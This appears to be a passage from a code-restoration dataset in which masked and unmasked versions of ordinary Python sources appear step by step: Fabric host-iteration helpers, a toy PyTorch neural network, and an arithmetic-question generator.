DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-4": "<mask token>\nfrom contextlib import contextmanager\nfrom fabric.api import env, settings, abort\nfrom os.path import join\nfrom pkg_resources import iter_entry_points\nfrom warnings import warn\nfrom fabric.network import ssh_config\nfrom confab.options import options\nfrom confab.validate import assert_exists\nfrom confab.loaders import FileSystemEnvironmentLoader\nfrom confab.data import DataLoader\nfrom confab.conffiles import ConfFiles\n\n\n@contextmanager\ndef this_hostname(hostname):\n \"\"\"\n Context manager that uses the current SSH confg to switch Fabric to a specific hostname.\n\n Updates hostname and port.\n \"\"\"\n host_config = ssh_config(hostname)\n host_string = hostname\n port = host_config.get('port', env.default_port)\n with settings(host_string=host_string, port=port):\n yield\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host_and_role in environmentdef.all():\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-5": "\"\"\"\nIterations over :term:`hosts<host>`, :term:`roles<role>`,\n:term:`components<component>` and config files.\n\"\"\"\nfrom contextlib import contextmanager\nfrom fabric.api import env, settings, abort\nfrom os.path import join\nfrom pkg_resources import iter_entry_points\nfrom warnings import warn\n\nfrom fabric.network import ssh_config\n\nfrom confab.options import options\nfrom confab.validate import assert_exists\nfrom confab.loaders import FileSystemEnvironmentLoader\nfrom confab.data import DataLoader\nfrom confab.conffiles import ConfFiles\n\n\n@contextmanager\ndef this_hostname(hostname):\n \"\"\"\n Context manager that uses the current SSH confg to switch Fabric to a specific hostname.\n\n Updates hostname and port.\n \"\"\"\n host_config = ssh_config(hostname)\n\n host_string = hostname\n port = host_config.get(\"port\", env.default_port)\n\n with settings(host_string=host_string,\n port=port):\n yield\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort(\"Environment needs to be configured\")\n\n environmentdef = env.environmentdef\n\n # If we're running via `fab`, we should restrict the environment\n # to the current host.\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n\n for host in environmentdef.hosts():\n # fabric needs the host if we're calling from main()\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n\n for host_and_role in environmentdef.all():\n # fabric needs the host if we're calling from main()\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n\n # Construct directories\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()), directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n\n return ConfFiles(host_and_role,\n FileSystemEnvironmentLoader(*templates_dirs),\n DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group=\"confab.extensions\"):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
class Neural_Network(nn.Module):
<|reserved_special_token_0|>
def __init__(self, input_size=2, output_size=1, hidden_size=3):
super(Neural_Network, self).__init__()
self.input_size = input_size
self.output_size = output_size
self.hidden_size = hidden_size
self.W1 = torch.randn(self.input_size, self.hidden_size)
self.W2 = torch.randn(self.hidden_size, self.output_size)
def forward(self, X):
"""forward calculation"""
self.z = torch.matmul(X, self.W1)
self.z2 = self.sigmoid(self.z)
self.z3 = torch.matmul(self.z2, self.W2)
o = self.sigmoid(self.z3)
return o
def backward(self, X, y, o):
"""backward calculation"""
self.o_error = y - o
self.o_delta = self.o_error * self.sigmoid_prime(o)
self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))
self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)
self.W1 += torch.matmul(torch.t(X), self.z2_delta)
self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)
def sigmoid(self, s):
"""calculate sigmoid"""
return 1 / (1 + torch.exp(-s))
def sigmoid_prime(self, s):
"""calculate derivative of sigmoid"""
return s * (1 - s)
def train(self, X, y):
o = self.forward(X)
self.backward(X, y, o)
def save_weights(self, model):
torch.save(model, 'NN')
def predict(self):
"""predict"""
print('Predicted data based on trained weights: ')
print('Input (scaled): \n' + str(xPredicted))
print('Output: \n' + str(self.forward(xPredicted)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Neural_Network(nn.Module):
"""Neural network class"""
def __init__(self, input_size=2, output_size=1, hidden_size=3):
super(Neural_Network, self).__init__()
self.input_size = input_size
self.output_size = output_size
self.hidden_size = hidden_size
self.W1 = torch.randn(self.input_size, self.hidden_size)
self.W2 = torch.randn(self.hidden_size, self.output_size)
def forward(self, X):
"""forward calculation"""
self.z = torch.matmul(X, self.W1)
self.z2 = self.sigmoid(self.z)
self.z3 = torch.matmul(self.z2, self.W2)
o = self.sigmoid(self.z3)
return o
def backward(self, X, y, o):
"""backward calculation"""
self.o_error = y - o
self.o_delta = self.o_error * self.sigmoid_prime(o)
self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))
self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)
self.W1 += torch.matmul(torch.t(X), self.z2_delta)
self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)
def sigmoid(self, s):
"""calculate sigmoid"""
return 1 / (1 + torch.exp(-s))
def sigmoid_prime(self, s):
"""calculate derivative of sigmoid"""
return s * (1 - s)
def train(self, X, y):
o = self.forward(X)
self.backward(X, y, o)
def save_weights(self, model):
torch.save(model, 'NN')
def predict(self):
"""predict"""
print('Predicted data based on trained weights: ')
print('Input (scaled): \n' + str(xPredicted))
print('Output: \n' + str(self.forward(xPredicted)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
X = torch.tensor(([2, 9], [1, 5], [3, 6]), dtype=torch.float)
y = torch.tensor(([92], [100], [89]), dtype=torch.float)
xPredicted = torch.tensor([4, 8], dtype=torch.float)
breakpoint()
X_max, index1 = torch.max(X, 0)
xPredicted_max, index2 = torch.max(xPredicted, 0)
X = torch.div(X, X_max)
xPredicted = torch.div(xPredicted, xPredicted_max)
y = y / 100
print('X_max:', X_max)
print('xPredicted_max:', xPredicted_max)
print('X:', X)
print('y:', y)
print('xPredicted:', xPredicted)
class Neural_Network(nn.Module):
"""Neural network class"""
def __init__(self, input_size=2, output_size=1, hidden_size=3):
super(Neural_Network, self).__init__()
self.input_size = input_size
self.output_size = output_size
self.hidden_size = hidden_size
self.W1 = torch.randn(self.input_size, self.hidden_size)
self.W2 = torch.randn(self.hidden_size, self.output_size)
def forward(self, X):
"""forward calculation"""
self.z = torch.matmul(X, self.W1)
self.z2 = self.sigmoid(self.z)
self.z3 = torch.matmul(self.z2, self.W2)
o = self.sigmoid(self.z3)
return o
def backward(self, X, y, o):
"""backward calculation"""
self.o_error = y - o
self.o_delta = self.o_error * self.sigmoid_prime(o)
self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))
self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)
self.W1 += torch.matmul(torch.t(X), self.z2_delta)
self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)
def sigmoid(self, s):
"""calculate sigmoid"""
return 1 / (1 + torch.exp(-s))
def sigmoid_prime(self, s):
"""calculate derivative of sigmoid"""
return s * (1 - s)
def train(self, X, y):
o = self.forward(X)
self.backward(X, y, o)
def save_weights(self, model):
torch.save(model, 'NN')
def predict(self):
"""predict"""
print('Predicted data based on trained weights: ')
print('Input (scaled): \n' + str(xPredicted))
print('Output: \n' + str(self.forward(xPredicted)))
NN = Neural_Network()
epoch = 1000
for i in range(epoch):
NN.train(X, y)
NN.save_weights(NN)
NN.predict()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import torch
import torch.nn as nn
X = torch.tensor(([2, 9], [1, 5], [3, 6]), dtype=torch.float)
y = torch.tensor(([92], [100], [89]), dtype=torch.float)
xPredicted = torch.tensor([4, 8], dtype=torch.float)
breakpoint()
X_max, index1 = torch.max(X, 0)
xPredicted_max, index2 = torch.max(xPredicted, 0)
X = torch.div(X, X_max)
xPredicted = torch.div(xPredicted, xPredicted_max)
y = y / 100
print('X_max:', X_max)
print('xPredicted_max:', xPredicted_max)
print('X:', X)
print('y:', y)
print('xPredicted:', xPredicted)
class Neural_Network(nn.Module):
"""Neural network class"""
def __init__(self, input_size=2, output_size=1, hidden_size=3):
super(Neural_Network, self).__init__()
self.input_size = input_size
self.output_size = output_size
self.hidden_size = hidden_size
self.W1 = torch.randn(self.input_size, self.hidden_size)
self.W2 = torch.randn(self.hidden_size, self.output_size)
def forward(self, X):
"""forward calculation"""
self.z = torch.matmul(X, self.W1)
self.z2 = self.sigmoid(self.z)
self.z3 = torch.matmul(self.z2, self.W2)
o = self.sigmoid(self.z3)
return o
def backward(self, X, y, o):
"""backward calculation"""
self.o_error = y - o
self.o_delta = self.o_error * self.sigmoid_prime(o)
self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))
self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)
self.W1 += torch.matmul(torch.t(X), self.z2_delta)
self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)
def sigmoid(self, s):
"""calculate sigmoid"""
return 1 / (1 + torch.exp(-s))
def sigmoid_prime(self, s):
"""calculate derivative of sigmoid"""
return s * (1 - s)
def train(self, X, y):
o = self.forward(X)
self.backward(X, y, o)
def save_weights(self, model):
torch.save(model, 'NN')
def predict(self):
"""predict"""
print('Predicted data based on trained weights: ')
print('Input (scaled): \n' + str(xPredicted))
print('Output: \n' + str(self.forward(xPredicted)))
NN = Neural_Network()
epoch = 1000
for i in range(epoch):
NN.train(X, y)
NN.save_weights(NN)
NN.predict()
<|reserved_special_token_1|>
"""
Simple neural network using pytorch
"""
import torch
import torch.nn as nn
# Prepare the data
# X represents the amount of hours studied and how much time students spent sleeping
X = torch.tensor(([2, 9], [1, 5], [3, 6]), dtype=torch.float) # 3 X 2 tensor
# y represent grades.
y = torch.tensor(([92], [100], [89]), dtype=torch.float) # 3 X 1 tensor
# xPredicted is a single input for which we want to predict a grade using
# the parameters learned by the neural network.
xPredicted = torch.tensor(([4, 8]), dtype=torch.float) # 1 X 2 tensor
# Scale units
breakpoint()
X_max, index1 = torch.max(X, 0)
xPredicted_max, index2 = torch.max(xPredicted, 0)
X = torch.div(X, X_max)
xPredicted = torch.div(xPredicted, xPredicted_max)
y = y / 100 # max test score is 100
print("X_max:", X_max)
print("xPredicted_max:", xPredicted_max)
print("X:", X)
print("y:", y)
print("xPredicted:", xPredicted)
class Neural_Network(nn.Module):
"""Neural network class"""
def __init__(self, input_size=2, output_size=1, hidden_size=3):
super(Neural_Network, self).__init__()
# parameters
self.input_size = input_size
self.output_size = output_size
self.hidden_size = hidden_size
# weights
self.W1 = torch.randn(self.input_size, self.hidden_size) # 3 X 2 tensor
self.W2 = torch.randn(self.hidden_size, self.output_size) # 3 X 1 tensor
def forward(self, X):
"""forward calculation"""
self.z = torch.matmul(X, self.W1) # 3 X 3 ".dot" does not broadcast in PyTorch
self.z2 = self.sigmoid(self.z) # activation function
self.z3 = torch.matmul(self.z2, self.W2)
o = self.sigmoid(self.z3) # final activation function
return o
def backward(self, X, y, o):
"""backward calculation"""
self.o_error = y - o # error in output
self.o_delta = self.o_error * self.sigmoid_prime(o) # derivative of sig to error
self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))
self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)
self.W1 += torch.matmul(torch.t(X), self.z2_delta)
self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)
def sigmoid(self, s):
"""calculate sigmoid"""
return 1 / (1 + torch.exp(-s))
def sigmoid_prime(self, s):
"""calculate derivative of sigmoid"""
return s * (1 - s)
def train(self, X, y):
# forward + backward pass for training
o = self.forward(X)
self.backward(X, y, o)
def save_weights(self, model):
# we will use the PyTorch internal storage functions
torch.save(model, "NN")
# you can reload model with all the weights and so forth with:
# torch.load("NN")
def predict(self):
"""predict"""
# @TODO: should be passed in as argument
print ("Predicted data based on trained weights: ")
print ("Input (scaled): \n" + str(xPredicted))
print ("Output: \n" + str(self.forward(xPredicted)))
NN = Neural_Network()
epoch = 1000
for i in range(epoch): # trains the NN epoch times
#print ("#" + str(i) + " Loss: " + str(torch.mean((y - NN(X))**2).detach().item())) # mean sum squared loss
NN.train(X, y)
NN.save_weights(NN)
NN.predict()
|
flexible
|
{
"blob_id": "2d5e7c57f58f189e8d0c7d703c1672ea3586e4ac",
"index": 6771,
"step-1": "<mask token>\n\n\nclass Neural_Network(nn.Module):\n <mask token>\n\n def __init__(self, input_size=2, output_size=1, hidden_size=3):\n super(Neural_Network, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.W1 = torch.randn(self.input_size, self.hidden_size)\n self.W2 = torch.randn(self.hidden_size, self.output_size)\n\n def forward(self, X):\n \"\"\"forward calculation\"\"\"\n self.z = torch.matmul(X, self.W1)\n self.z2 = self.sigmoid(self.z)\n self.z3 = torch.matmul(self.z2, self.W2)\n o = self.sigmoid(self.z3)\n return o\n\n def backward(self, X, y, o):\n \"\"\"backward calculation\"\"\"\n self.o_error = y - o\n self.o_delta = self.o_error * self.sigmoid_prime(o)\n self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))\n self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)\n self.W1 += torch.matmul(torch.t(X), self.z2_delta)\n self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)\n\n def sigmoid(self, s):\n \"\"\"calculate sigmoid\"\"\"\n return 1 / (1 + torch.exp(-s))\n\n def sigmoid_prime(self, s):\n \"\"\"calculate derivative of sigmoid\"\"\"\n return s * (1 - s)\n\n def train(self, X, y):\n o = self.forward(X)\n self.backward(X, y, o)\n\n def save_weights(self, model):\n torch.save(model, 'NN')\n\n def predict(self):\n \"\"\"predict\"\"\"\n print('Predicted data based on trained weights: ')\n print('Input (scaled): \\n' + str(xPredicted))\n print('Output: \\n' + str(self.forward(xPredicted)))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Neural_Network(nn.Module):\n \"\"\"Neural network class\"\"\"\n\n def __init__(self, input_size=2, output_size=1, hidden_size=3):\n super(Neural_Network, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.W1 = torch.randn(self.input_size, self.hidden_size)\n self.W2 = torch.randn(self.hidden_size, self.output_size)\n\n def forward(self, X):\n \"\"\"forward calculation\"\"\"\n self.z = torch.matmul(X, self.W1)\n self.z2 = self.sigmoid(self.z)\n self.z3 = torch.matmul(self.z2, self.W2)\n o = self.sigmoid(self.z3)\n return o\n\n def backward(self, X, y, o):\n \"\"\"backward calculation\"\"\"\n self.o_error = y - o\n self.o_delta = self.o_error * self.sigmoid_prime(o)\n self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))\n self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)\n self.W1 += torch.matmul(torch.t(X), self.z2_delta)\n self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)\n\n def sigmoid(self, s):\n \"\"\"calculate sigmoid\"\"\"\n return 1 / (1 + torch.exp(-s))\n\n def sigmoid_prime(self, s):\n \"\"\"calculate derivative of sigmoid\"\"\"\n return s * (1 - s)\n\n def train(self, X, y):\n o = self.forward(X)\n self.backward(X, y, o)\n\n def save_weights(self, model):\n torch.save(model, 'NN')\n\n def predict(self):\n \"\"\"predict\"\"\"\n print('Predicted data based on trained weights: ')\n print('Input (scaled): \\n' + str(xPredicted))\n print('Output: \\n' + str(self.forward(xPredicted)))\n\n\n<mask token>\n",
"step-3": "<mask token>\nX = torch.tensor(([2, 9], [1, 5], [3, 6]), dtype=torch.float)\ny = torch.tensor(([92], [100], [89]), dtype=torch.float)\nxPredicted = torch.tensor([4, 8], dtype=torch.float)\nbreakpoint()\nX_max, index1 = torch.max(X, 0)\nxPredicted_max, index2 = torch.max(xPredicted, 0)\nX = torch.div(X, X_max)\nxPredicted = torch.div(xPredicted, xPredicted_max)\ny = y / 100\nprint('X_max:', X_max)\nprint('xPredicted_max:', xPredicted_max)\nprint('X:', X)\nprint('y:', y)\nprint('xPredicted:', xPredicted)\n\n\nclass Neural_Network(nn.Module):\n \"\"\"Neural network class\"\"\"\n\n def __init__(self, input_size=2, output_size=1, hidden_size=3):\n super(Neural_Network, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.W1 = torch.randn(self.input_size, self.hidden_size)\n self.W2 = torch.randn(self.hidden_size, self.output_size)\n\n def forward(self, X):\n \"\"\"forward calculation\"\"\"\n self.z = torch.matmul(X, self.W1)\n self.z2 = self.sigmoid(self.z)\n self.z3 = torch.matmul(self.z2, self.W2)\n o = self.sigmoid(self.z3)\n return o\n\n def backward(self, X, y, o):\n \"\"\"backward calculation\"\"\"\n self.o_error = y - o\n self.o_delta = self.o_error * self.sigmoid_prime(o)\n self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))\n self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)\n self.W1 += torch.matmul(torch.t(X), self.z2_delta)\n self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)\n\n def sigmoid(self, s):\n \"\"\"calculate sigmoid\"\"\"\n return 1 / (1 + torch.exp(-s))\n\n def sigmoid_prime(self, s):\n \"\"\"calculate derivative of sigmoid\"\"\"\n return s * (1 - s)\n\n def train(self, X, y):\n o = self.forward(X)\n self.backward(X, y, o)\n\n def save_weights(self, model):\n torch.save(model, 'NN')\n\n def predict(self):\n \"\"\"predict\"\"\"\n print('Predicted data based on trained weights: ')\n print('Input (scaled): \\n' + str(xPredicted))\n print('Output: \\n' + str(self.forward(xPredicted)))\n\n\nNN = Neural_Network()\nepoch = 1000\nfor i in range(epoch):\n NN.train(X, y)\nNN.save_weights(NN)\nNN.predict()\n",
"step-4": "<mask token>\nimport torch\nimport torch.nn as nn\nX = torch.tensor(([2, 9], [1, 5], [3, 6]), dtype=torch.float)\ny = torch.tensor(([92], [100], [89]), dtype=torch.float)\nxPredicted = torch.tensor([4, 8], dtype=torch.float)\nbreakpoint()\nX_max, index1 = torch.max(X, 0)\nxPredicted_max, index2 = torch.max(xPredicted, 0)\nX = torch.div(X, X_max)\nxPredicted = torch.div(xPredicted, xPredicted_max)\ny = y / 100\nprint('X_max:', X_max)\nprint('xPredicted_max:', xPredicted_max)\nprint('X:', X)\nprint('y:', y)\nprint('xPredicted:', xPredicted)\n\n\nclass Neural_Network(nn.Module):\n \"\"\"Neural network class\"\"\"\n\n def __init__(self, input_size=2, output_size=1, hidden_size=3):\n super(Neural_Network, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.W1 = torch.randn(self.input_size, self.hidden_size)\n self.W2 = torch.randn(self.hidden_size, self.output_size)\n\n def forward(self, X):\n \"\"\"forward calculation\"\"\"\n self.z = torch.matmul(X, self.W1)\n self.z2 = self.sigmoid(self.z)\n self.z3 = torch.matmul(self.z2, self.W2)\n o = self.sigmoid(self.z3)\n return o\n\n def backward(self, X, y, o):\n \"\"\"backward calculation\"\"\"\n self.o_error = y - o\n self.o_delta = self.o_error * self.sigmoid_prime(o)\n self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))\n self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)\n self.W1 += torch.matmul(torch.t(X), self.z2_delta)\n self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)\n\n def sigmoid(self, s):\n \"\"\"calculate sigmoid\"\"\"\n return 1 / (1 + torch.exp(-s))\n\n def sigmoid_prime(self, s):\n \"\"\"calculate derivative of sigmoid\"\"\"\n return s * (1 - s)\n\n def train(self, X, y):\n o = self.forward(X)\n self.backward(X, y, o)\n\n def save_weights(self, model):\n torch.save(model, 'NN')\n\n def predict(self):\n \"\"\"predict\"\"\"\n print('Predicted data based on trained weights: ')\n print('Input (scaled): \\n' + str(xPredicted))\n print('Output: \\n' + str(self.forward(xPredicted)))\n\n\nNN = Neural_Network()\nepoch = 1000\nfor i in range(epoch):\n NN.train(X, y)\nNN.save_weights(NN)\nNN.predict()\n",
"step-5": "\"\"\"\nSimple neural network using pytorch\n\"\"\"\nimport torch\nimport torch.nn as nn\n\n# Prepare the data\n\n# X represents the amount of hours studied and how much time students spent sleeping\nX = torch.tensor(([2, 9], [1, 5], [3, 6]), dtype=torch.float) # 3 X 2 tensor\n# y represent grades. \ny = torch.tensor(([92], [100], [89]), dtype=torch.float) # 3 X 1 tensor\n# xPredicted is a single input for which we want to predict a grade using \n# the parameters learned by the neural network.\nxPredicted = torch.tensor(([4, 8]), dtype=torch.float) # 1 X 2 tensor\n\n# Scale units\nbreakpoint()\nX_max, index1 = torch.max(X, 0)\nxPredicted_max, index2 = torch.max(xPredicted, 0)\n\nX = torch.div(X, X_max)\nxPredicted = torch.div(xPredicted, xPredicted_max)\ny = y / 100 # max test score is 100\n\nprint(\"X_max:\", X_max)\nprint(\"xPredicted_max:\", xPredicted_max)\nprint(\"X:\", X)\nprint(\"y:\", y)\nprint(\"xPredicted:\", xPredicted)\n\nclass Neural_Network(nn.Module):\n \"\"\"Neural network class\"\"\"\n def __init__(self, input_size=2, output_size=1, hidden_size=3):\n super(Neural_Network, self).__init__()\n # parameters\n\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n \n # weights\n self.W1 = torch.randn(self.input_size, self.hidden_size) # 3 X 2 tensor\n self.W2 = torch.randn(self.hidden_size, self.output_size) # 3 X 1 tensor\n \n def forward(self, X):\n \"\"\"forward calculation\"\"\"\n self.z = torch.matmul(X, self.W1) # 3 X 3 \".dot\" does not broadcast in PyTorch\n self.z2 = self.sigmoid(self.z) # activation function\n self.z3 = torch.matmul(self.z2, self.W2)\n o = self.sigmoid(self.z3) # final activation function\n return o\n\n def backward(self, X, y, o):\n \"\"\"backward calculation\"\"\"\n self.o_error = y - o # error in output\n self.o_delta = self.o_error * self.sigmoid_prime(o) # derivative of sig to error\n self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))\n self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)\n self.W1 += torch.matmul(torch.t(X), self.z2_delta)\n self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)\n \n def sigmoid(self, s):\n \"\"\"calculate sigmoid\"\"\"\n return 1 / (1 + torch.exp(-s))\n \n def sigmoid_prime(self, s):\n \"\"\"calculate derivative of sigmoid\"\"\"\n return s * (1 - s)\n \n def train(self, X, y):\n # forward + backward pass for training\n o = self.forward(X)\n self.backward(X, y, o)\n \n def save_weights(self, model):\n # we will use the PyTorch internal storage functions\n torch.save(model, \"NN\")\n # you can reload model with all the weights and so forth with:\n # torch.load(\"NN\")\n \n def predict(self):\n \"\"\"predict\"\"\"\n # @TODO: should be passed in as argument\n print (\"Predicted data based on trained weights: \")\n print (\"Input (scaled): \\n\" + str(xPredicted))\n print (\"Output: \\n\" + str(self.forward(xPredicted)))\n \n\nNN = Neural_Network()\nepoch = 1000\nfor i in range(epoch): # trains the NN epoch times\n #print (\"#\" + str(i) + \" Loss: \" + str(torch.mean((y - NN(X))**2).detach().item())) # mean sum squared loss\n NN.train(X, y)\nNN.save_weights(NN)\nNN.predict()",
"step-ids": [
9,
10,
12,
13,
14
]
}
|
[
9,
10,
12,
13,
14
] |
from random import randint, shuffle
class Generator:
opset = ['+', '-', '*', '/', '²', '√', 'sin', 'cos', 'tan']
@staticmethod
def generate(level):
"""
根据 level 生成指定等级的算术题
0:小学;1:初中;2:高中
"""
"""
生成操作数序列以及二元运算符序列
"""
length = randint(0 if level else 1, 4)
op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]
numArr = [randint(1, 100) for i in range(length + 1)]
"""
生成二元运算符的位置
"""
remain = 1
position = []
for i in range(length):
position.append(randint(0, remain))
remain += 1 - position[i]
if remain > 1:
position[-1] += remain - 1
"""
生成一元运算符序列
"""
op1Arr = []
if level:
if level == 1:
op1Arr.append(Generator.opset[randint(4, 5)])
elif level == 2:
op1Arr.append(Generator.opset[randint(6, 8)])
for i in range(randint(0, level)):
op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else
8)])
shuffle(op1Arr)
"""
生成后缀表达式
"""
expression = numArr
offset = 2
index = 0
for i in range(length):
for j in range(position[i]):
expression.insert(i + j + offset, op2Arr[index])
index += 1
offset += position[i]
for op in op1Arr:
expression.insert(randint(1, len(expression)), op)
def getPriority(item):
"""
返回运算符或操作数的优先级
操作数:0
一元运算符:1
'*'、'/':2
'+'、'-':3
"""
if isinstance(item, int):
return 0
elif item == '+' or item == '-':
return 3
elif item == '*' or item == '/':
return 2
else:
return 1
"""
转换成中缀表达式
stack 存储 (expression, priority)
"""
stack = []
for e in expression:
priority = getPriority(e)
if priority == 0:
"""
是一个操作数,直接入栈
"""
stack.append((e, 0))
elif priority == 3:
"""
是加/减运算,优先级最低,拼接后直接入栈
"""
item2 = stack.pop()[0]
item1 = stack.pop()[0]
stack.append(('%s%s%s' % (item1, e, item2), 3))
elif priority == 2:
"""
是乘/除运算,如果有加/减运算需要加括号
"""
item2, prio2 = stack.pop()
if prio2 > 2:
item2 = '(%s)' % item2
item1, prio1 = stack.pop()
if prio1 > 2:
item1 = '(%s)' % item1
stack.append(('%s%s%s' % (item1, e, item2), 2))
elif priority == 1:
"""
是一元运算,除了操作数都要加括号
"""
item, prio = stack.pop()
if prio:
item = '(%s)' % item
if e == '²':
stack.append(('%s%s' % (item, '²'), 1))
else:
stack.append(('%s%s' % (e, item), 1))
return stack[0][0]
|
normal
|
{
"blob_id": "6e3bb17696953256af6d8194128427acebf1daac",
"index": 524,
"step-1": "<mask token>\n",
